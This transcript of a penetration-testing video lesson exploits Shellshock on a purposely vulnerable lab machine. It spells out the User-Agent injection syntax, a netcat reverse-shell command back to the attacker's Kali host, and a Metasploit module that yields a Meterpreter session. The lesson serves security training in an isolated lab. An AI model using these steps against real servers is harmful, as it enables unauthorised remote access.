Welcome back. It is time that we cover our first vulnerability in a website, and as a first vulnerability I've chosen to show you the Shellshock exploitation. Now, Shellshock is an older vulnerability, it was discovered in 2014, and you will most likely never find it today while performing penetration tests. But nonetheless, I want to show it to you just because of the impact that it had; Shellshock is considered one of the most critical and serious vulnerabilities ever discovered. This vulnerability occurred due to Bash processing environment variables differently. With this, many things were hit, from the clients and terminal command lines to CGI scripts inside of web applications. And in this tutorial, we will see an example of exploiting Shellshock through the CGI script on a web page. Also, for this we're going to download a small ISO file that will allow us to run a virtual machine only for this vulnerability. Don't worry, it'll only take a few seconds to install due to being a small virtual machine, and it is purposely designed only for this specific vulnerability. To download it, you want to go to Google; you can type in "pentesterlab shellshock" and you should see a link like this that says CVE-2014-6271 - Shellshock. It will be from pentesterlab.com.
And you want to click on it, and it will then get you to this page right here where you will have the Shellshock introduction, fingerprinting and all the other stuff regarding this vulnerability. However, we're not going to go into these details right here because we want to exploit it ourselves. What we want to do is go to the files right here. And you should see this ISO, where you want to click on it and it will download the ISO image with the size of 19.1 megabytes. So you can see it is really, really small. Once you do that, you want to go to your VirtualBox and create a virtual machine, as we usually do. Now, I already got the Shellshock lab created with the ISO file that we just downloaded. But what you essentially want to do is click on New, then you can call it anything you want. You can call it Shellshock. You can select Linux right here as the operating system, and the version of Linux is going to be Other Linux (32-bit). Click on that, then you can proceed to Next. You can leave it at 256 megabytes of RAM; that is more than enough for this machine. Click on Next right here. We want to create a virtual machine; Next here, Next here as well, and we can click on Create.
And as usual, there are two more things that we want to do once we create a new virtual machine: we want to navigate to the Settings. From the Settings we want to go to Network, switch from NAT to Bridged Adapter, and select your adapter right here. And another thing that you want to do is add our ISO file. So delete this "Empty" right here, click on the disc icon, click on Add and find the ISO file; in my case, here it is, CVE-2014-6271. Click on Choose and click on OK. This will create your Shellshock virtual machine. After you do that, you want to go to your Kali, start your Burp Suite that we covered already, that we covered the configuration of, and you want to start it up, and after you start it up, you can open your Firefox. Now, you might have noticed, if you tried before watching this video, that once you try to visit a page in Firefox without having Burp Suite running, you will not be able to visit any page. And that is because we set Burp Suite to be a proxy for our Firefox. So now every time you want to visit a Firefox page or any website page, you must have Burp Suite open and you must also have the intercept turned off so it doesn't intercept any packets. Otherwise your page will just load forever.
Now that we opened Firefox, let us open Burp Suite; it is starting the project, and as soon as it opens up, we will be able to visit our page on our Shellshock virtual machine. OK, so now that Burp Suite opened, go to Target, then go to Proxy and turn off the intercept right here. So intercept should be off. Once you do that, the next thing that we want to do is start our Shellshock virtual machine. If you're starting it for the first time, it should only take a few seconds to set everything up, since it is a really, really small virtual machine. And once it opens up, it won't even prompt you for a login. There is no login available inside of this machine right here. It will just enter the command line, where we want to type ifconfig just to find out the IP address of this machine, and in this case it is 192.168.1.10. So all we want to do is go to our Firefox and visit this page to see what we have. And this seems to be the entire page of this virtual machine we get: this system is running, the time that it is running currently is zero minutes because we just started it up, and we get the kernel of that virtual machine.
Now, if we take a look at our Burp Suite right now and we go to the Target tab and we go to the IP address of the Shellshock virtual machine, we will see all the links that we requested once trying to open the web page of our Shellshock virtual machine. We will see this directory, we will see this JavaScript file and we will see this cgi-bin/status directory. So we get a CGI script right here. If we go to the response of that request that we sent, and to do that you simply just select the request that you want to go to and click on Response right here, then we will see down here this output that looks a lot like the output of the command uname -a, for example. If you run the command uname -a inside of your terminal, it will give you an output like this, which will tell you which version of Linux you are running and so on and so on. We get a similar output inside of our Burp Suite, as we can see right here. And in most cases, this output is produced by the uname -a command and it is run by Bash, and inside this request that we did, the User-Agent field that we got inside of the request is an environment variable when processed inside of this CGI script. So what we can try is to inject a command in that field. However, it won't work that easy.
If we just inject, for example, the whoami command instead of this, it will not give us any output back. You might be asking why? Well, because the Shellshock vulnerability is based on first specifying an empty function. And I know this might sound confusing, but just stick with me for a couple more minutes and I will explain how it works. The vulnerability itself was discovered when, inside of an environment variable such as this User-Agent, empty function syntax was specified, and empty function syntax looks something like this. Let me show you inside the terminal: it is this set of characters, open bracket, close bracket and space, open curly bracket, then space, two dots, dot and comma, and close curly bracket, and at the end another dot and comma. And this right here is the syntax for an empty function. So for any command that we want to run, before it we must have this empty function syntax. Why? Well, when Bash gets these characters in this order, or if Bash gets this empty function with the variable, instead of blocking it, it will accept it with the variable that comes after and it runs it as a command on the server. And that is the entire vulnerability. All we have to do is specify a command after the syntax and it should work.
Now, to do that, we must send this HTTP request right here to this CGI script once again, and we must specify, instead of the User-Agent, the empty function syntax and then our command. So how can we do that? How can we send the request once again? Well, luckily it allows us to edit our requests and send them as many times as we want. All we need to do is select the request that we want to send again. So we select it right here, then we right-click and Send to Repeater right here. Then you will see this Repeater tab light up. We want to go there, and here we can edit our request before actually sending it. So we mentioned that we want to inject the command inside of the User-Agent field. Let us remove this. And let's type the syntax for the empty function first, so open and closed bracket, then empty space, open curly bracket, then space, two dots, dot and comma, close curly bracket, and dot and comma at the end. Now, what you can do after this is inject your command, and if you want to, you can test to see if it works with the ping command first. But I'm not going to test it with the ping command. I'm going to straightaway try to establish a connection with our Kali Linux machine and get our reverse shell back.
So what do we want to do right here to establish a connection with our Kali machine? Well, we want to execute /bin/bash, and this will tell the target to execute the following command. If we specify -c after it, it will tell our target that whatever we send after this will be our command, and we must specify it between single quotes. So for now we have the empty function syntax, then /bin/bash -c, then an opening single quote and a closing quote, and in between the quotes we type nc, which stands for netcat, and we specify the IP address of our Kali Linux machine. So let's check it out right here. So I type ifconfig; test1234 is my password, and I will specify 192.168.1.9. So right here, 192.168.1.9. And I want to specify also the port to connect to. In my case I will use port 12345; it doesn't really matter. And at the end we want to specify -e, which stands for what we want to execute on our target machine. And we want to simply just use the shell, so we can do that by specifying /bin/bash. And this is the entire command; let me copy it to my terminal so you can see it enlarged. So copy, and if I clear the screen, paste it right here.
This is our entire command: the empty function syntax and then the function that allows us to establish a connection to our Kali Linux machine. But before we send this request from our Burp Suite, we must set up a listener right here. So I'm just going to go and type nc -lvp and then the port that we specified, which is 12345, press Enter, and this will listen for incoming connections. And now that we changed the User-Agent field to our command, we can click on Send. If I go back to our Kali terminal, we can see that we got the connection from our Shellshock virtual machine, and if we try to execute commands such as whoami, all of that will work. We can see we are pentesterlab. The ls command will give me all the directories inside of the current directory. I can also check out my current working directory, and I am in this /var/www/cgi-bin folder. Great. So we successfully exploited this Shellshock vulnerability and gained access to this machine. Now you can also automate this entire process with the Metasploit Framework. So what we did right here is we manually exploited the target with the help of Burp Suite. We sent our request for the CGI script to the Repeater.
Then we changed the User-Agent field to our command, which requires the empty function syntax at the beginning and after it the command that we want to execute, which can be any command that you really want. Then we set up a listener inside of our terminal and we sent this packet once again, or we sent this request once again. Right here we can see the response to this request, and it tells us that we got an Internal Server Error because it doesn't really recognize this User-Agent. However, it did execute this command, which is all that we want. Inside of the Metasploit Framework you can type search shellshock, and you can use this exploit right here, which is exploit/multi/http/apache_mod_cgi_bash_env_exec; you can copy that, type use and then paste this selection. It will set our payload to be linux/x86/meterpreter/reverse_tcp, and if I type show options I can set my options right here. So what I must set is RHOSTS, which is the IP address of my target machine. Let's do that first. But what I also must set is this RPATH. So this will be the path to the CGI script. So the RPATH must be set to /cgi-bin/status, if I'm not mistaken. That is the path; let us see inside of our website.
So it indeed is cgi-bin and then status, and all we are left to do right now is set this and run our exploit. Oh, pardon me, it's not there. Let's just go and set the TARGETURI. It is TARGETURI that we must set to be /cgi-bin/status. So let's just set the TARGETURI instead. And let's set the RPATH back to /bin, I believe, and let's give this a try. We send this, and we get a Meterpreter session 1 opened. And here it is; getuid will tell us who we are, we can execute the commands and we can do everything that we did inside of our exploitation section. So we successfully exploited the Shellshock vulnerability in two different ways: manually, by using Burp Suite and sending our command in the User-Agent field, and with the help of this Metasploit Framework module. It also exploited the User-Agent field, as we can see right here. We told the path to be cgi-bin/status and we got the Meterpreter reverse shell back. Great. Now that we did this, in the next video we are going to check out a very similar thing to this, which is called command injection. See you in the next video.